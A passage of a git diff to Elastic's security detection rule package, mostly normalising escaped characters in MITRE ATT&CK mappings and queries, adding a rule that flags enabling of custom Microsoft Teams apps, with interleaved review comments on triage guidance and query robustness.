"https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022_107", + "type": "security-rule" +} \ No newline at end of file 
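Review bot: The investigation step in the new `note` that sends analysts to Event IDs 4698 and 4699 depends on the "Audit Other Object Access Events" subcategory being enabled, and a task that is edited in place emits 4702 rather than 4698, so the guide should say both and give the Microsoft-Windows-TaskScheduler/Operational log as a fallback; e.g. `- Analyze the host's scheduled tasks and the related Windows events (4698 created, 4702 updated, 4699 deleted; these require the 'Audit Other Object Access Events' subcategory) or the TaskScheduler/Operational log (Event ID 106, task registered).` The same field expands COM as "Command Object Model" while the `description` correctly says "Component Object Model"; change the line to `taskschd.dll provides Component Object Model (COM) interfaces for the Windows Task Scheduler service`. The `process.name` list covers Word, Excel, PowerPoint, Publisher and Access but not OUTLOOK.EXE or VISIO.EXE; if that omission is deliberate (add-in noise), a sentence in the note saying so would help tuners, otherwise consider adding them. Since the query matches on `dll.name`/`file.name` alone, the triage steps could also tell the analyst to check `dll.path`, because a `taskschd.dll` loaded from outside System32 would presumably be a much stronger signal than the legitimate system copy.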
diff --git a/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_101.json b/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_101.json index b365f9526df..905cfe1aa6a 100644 --- a/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_101.json +++ b/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_101.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_102.json b/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_102.json index 0363b5e4a49..1ec985c204e 100644 --- a/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_102.json +++ b/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -71,7 +71,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_102.json b/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_102.json index 0b70d3fb95e..c5a77ce05f1 100644 --- a/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_102.json 
+++ b/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_102.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_103.json b/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_103.json index e4dad4c0ef7..7bbdfe2b7fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_103.json +++ b/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_103.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_104.json b/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_104.json index 84ab86e8990..a09d5841d85 100644 --- a/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_104.json +++ b/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_104.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_205.json b/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_205.json index 707a6d0cfc2..2e40b70fb2a 100644 --- a/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_205.json +++ b/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_205.json 
@@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_101.json b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_101.json index b2a7066b147..bdd6bc63e3e 100644 --- a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_101.json +++ b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_101.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_102.json b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_102.json index cc9d040ded8..67fae8067e0 100644 --- a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_102.json +++ b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_102.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_1.json b/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_1.json index 6e03868fbb4..cfaf824284a 100644 --- a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_1.json +++ b/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_1.json 
@@ -13,7 +13,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential SYN-Based Network Scan Detected", - "query": "destination.port :* and network.packets \u003c= 2\n", + "query": "destination.port :* and network.packets <= 2\n", "related_integrations": [ { "package": "endpoint", @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -62,7 +62,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", diff --git a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_2.json b/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_2.json index 2b9f7ca64c6..c8932454c03 100644 --- a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_2.json +++ b/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_2.json @@ -13,7 +13,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential SYN-Based Network Scan Detected", - "query": "destination.port : * and network.packets \u003c= 2 and source.ip : (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)\n", + "query": "destination.port : * and network.packets <= 2 and source.ip : (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)\n", "related_integrations": [ { "package": "endpoint", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -67,7 +67,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", 
diff --git a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_3.json b/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_3.json index 145d05412e9..0c113a8da70 100644 --- a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_3.json +++ b/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_3.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential SYN-Based Network Scan Detected", - "query": "destination.port : * and network.packets \u003c= 2 and source.ip : (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)\n", + "query": "destination.port : * and network.packets <= 2 and source.ip : (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)\n", "related_integrations": [ { "package": "endpoint", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -69,7 +69,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", diff --git a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_4.json b/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_4.json index e67fc46cb37..c3a9386b805 100644 --- a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_4.json +++ b/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_4.json 
@@ -16,7 +16,7 @@ "license": "Elastic License v2", "max_signals": 5, "name": "Potential SYN-Based Network Scan Detected", - "query": "destination.port : * and network.packets \u003c= 2 and source.ip : (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)\n", + "query": "destination.port : * and network.packets <= 2 and source.ip : (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)\n", "related_integrations": [ { "package": "endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -70,7 +70,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", diff --git a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_101.json b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_101.json index cbf1778ec98..0ce8ede0f71 100644 --- a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_101.json +++ b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_101.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_102.json b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_102.json index 0d497fae758..6b77b47db09 100644 --- a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_102.json +++ b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_102.json @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_103.json b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_103.json new file mode 100644 index 00000000000..05fc3a7c088 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_103.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when custom applications are allowed in Microsoft Teams. If an organization requires applications other than those available in the Teams app store, custom applications can be developed as packages and uploaded. An adversary may abuse this behavior to establish persistence in an environment.", + "false_positives": [ + "Custom applications may be allowed by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams Custom Application Interaction Allowed", + "note": "", + "query": "event.dataset:o365.audit and event.provider:MicrosoftTeams and\nevent.category:web and event.action:TeamsTenantSettingChanged and\no365.audit.Name:\"Allow sideloading and interaction of custom apps\" and\no365.audit.NewValue:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoftteams/platform/concepts/deploy-and-publish/apps-upload" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Name", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.NewValue", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "bbd1a775-8267-41fa-9232-20e5582596ac", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly 
structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "bbd1a775-8267-41fa-9232-20e5582596ac_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_105.json b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_105.json index 60f36d07308..ac04ca6c441 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_105.json +++ b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_105.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_106.json b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_106.json index ee9433813e5..9722f6eca33 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_106.json +++ b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_106.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", 
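Review bot: The new rule ships with `"note": ""`, so a medium-severity tenant-wide configuration change (risk score 47) carries no triage guidance; at minimum the note should tell the analyst to identify the actor from the o365 audit user fields, confirm a matching change request, and review the custom apps uploaded or installed in the tenant after the toggle, since enabling sideloading is only the precondition for the persistence the description warns about. The `technique` array under Persistence is left empty; if no ATT&CK technique fits this setting, a short remark in the rule source saying so would stop the mapping from reading as unfinished. Matching `o365.audit.NewValue:True` against a field declared as `keyword` in `required_fields` is case-sensitive, so the rule would silently stop firing if the integration ever emitted `true`; I would confirm the field's normalization in the o365 integration or match both spellings, e.g. `o365.audit.NewValue:(True or true)`.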
diff --git a/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_107.json b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_107.json index b4cbabc0d33..cc139124014 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_107.json +++ b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_107.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_208.json b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_208.json index 6d630e98345..0b0dfee712a 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_208.json +++ b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_208.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/bc0f2d83-32b8-4ae2-b0e6-6a45772e9331_103.json b/packages/security_detection_engine/kibana/security_rule/bc0f2d83-32b8-4ae2-b0e6-6a45772e9331_103.json index 9d00593330a..99d44e48745 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc0f2d83-32b8-4ae2-b0e6-6a45772e9331_103.json +++ b/packages/security_detection_engine/kibana/security_rule/bc0f2d83-32b8-4ae2-b0e6-6a45772e9331_103.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", 
diff --git a/packages/security_detection_engine/kibana/security_rule/bc0f2d83-32b8-4ae2-b0e6-6a45772e9331_104.json b/packages/security_detection_engine/kibana/security_rule/bc0f2d83-32b8-4ae2-b0e6-6a45772e9331_104.json index e3a25a98b96..0674ee08bc7 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc0f2d83-32b8-4ae2-b0e6-6a45772e9331_104.json +++ b/packages/security_detection_engine/kibana/security_rule/bc0f2d83-32b8-4ae2-b0e6-6a45772e9331_104.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_102.json b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_102.json index ec15e358c76..f1702211aa3 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_102.json +++ b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_102.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_103.json b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_103.json index 65678dc18a1..887d50e6719 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_103.json +++ b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_103.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_104.json b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_104.json
index d3d50cef82f..76119e89496 100644
--- a/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_104.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_105.json b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_105.json
index ca2478dfc19..1d8a22bfcc9 100644
--- a/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_105.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_101.json b/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_101.json
index 5de77cf0472..5f885de11c2 100644
--- a/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_101.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_102.json b/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_102.json
index f7670fec21f..f10907efc50 100644
--- a/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_102.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_2.json b/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_2.json
index bdf36765141..30be0593229 100644
--- a/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_2.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_3.json b/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_3.json
index e74ec49ca79..d0383407e23 100644
--- a/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_3.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_4.json b/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_4.json
index 3fc5be541c6..0b655f4a4ed 100644
--- a/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_4.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_5.json b/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_5.json
index 63b7d8ff4be..95152cef23d 100644
--- a/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_5.json
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/bc9e4f5a-e263-4213-a2ac-1edf9b417ada_1.json b/packages/security_detection_engine/kibana/security_rule/bc9e4f5a-e263-4213-a2ac-1edf9b417ada_1.json
index e68cccf05f3..82804ea99a8 100644
--- a/packages/security_detection_engine/kibana/security_rule/bc9e4f5a-e263-4213-a2ac-1edf9b417ada_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/bc9e4f5a-e263-4213-a2ac-1edf9b417ada_1.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/bca7d28e-4a48-47b1-adb7-5074310e9a61_103.json b/packages/security_detection_engine/kibana/security_rule/bca7d28e-4a48-47b1-adb7-5074310e9a61_103.json
index 298086c9f87..120c26554d7 100644
--- a/packages/security_detection_engine/kibana/security_rule/bca7d28e-4a48-47b1-adb7-5074310e9a61_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/bca7d28e-4a48-47b1-adb7-5074310e9a61_103.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/bca7d28e-4a48-47b1-adb7-5074310e9a61_104.json b/packages/security_detection_engine/kibana/security_rule/bca7d28e-4a48-47b1-adb7-5074310e9a61_104.json
index 4ad048b6642..b3da73966a0 100644
--- a/packages/security_detection_engine/kibana/security_rule/bca7d28e-4a48-47b1-adb7-5074310e9a61_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/bca7d28e-4a48-47b1-adb7-5074310e9a61_104.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/bcaa15ce-2d41-44d7-a322-918f9db77766_1.json b/packages/security_detection_engine/kibana/security_rule/bcaa15ce-2d41-44d7-a322-918f9db77766_1.json
index 1e7cfe6d49f..797f0ccde2c 100644
--- a/packages/security_detection_engine/kibana/security_rule/bcaa15ce-2d41-44d7-a322-918f9db77766_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/bcaa15ce-2d41-44d7-a322-918f9db77766_1.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
